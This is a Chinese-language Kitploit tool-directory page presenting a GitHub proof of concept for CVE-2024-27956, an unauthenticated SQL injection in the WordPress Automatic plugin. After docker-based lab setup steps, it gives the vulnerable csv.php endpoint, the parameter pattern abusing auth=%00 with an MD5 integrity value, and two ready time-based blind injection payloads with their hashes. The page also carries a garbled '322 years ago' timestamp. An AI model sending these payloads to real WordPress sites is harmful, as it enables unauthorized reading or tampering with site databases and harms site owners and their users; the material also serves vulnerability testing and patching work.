Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/truonghuuphuc/cve-2024-27956
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubtruonghuuphuc/cve-2024-27956

CVE-2024-27956

CVE-2024-27956 WordPress Automatic < 3.92.1 - 未认证的SQL注入

查看仓库
322年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-27956

注意

构建WordPress:docker-compose -f stack.yml up

安装插件:

  1. 进入WordPress仪表盘,选择插件 > 添加新插件

  2. 点击上传插件

image

  1. 选择文件 -> wp-automatic.zip -> 立即安装

image

  1. 安装完成后,点击启用插件

image

漏洞利用

<HOST>/wp-content/plugins/wp-automatic/inc/csv.php

q={{query}}&auth=%00&integ={{md5query}}

root@kitploit:~
q=SELECT+IF(1=1,sleep(5),sleep(0))&auth=%00&integ=93cf9aa11e746596d6f31765a7222c9f

image

root@kitploit:~
q=SELECT+IF(1=2,sleep(5),sleep(0))&auth=%00&integ=4b1f4024af81df56c3b00679b9b52183

image

下载工具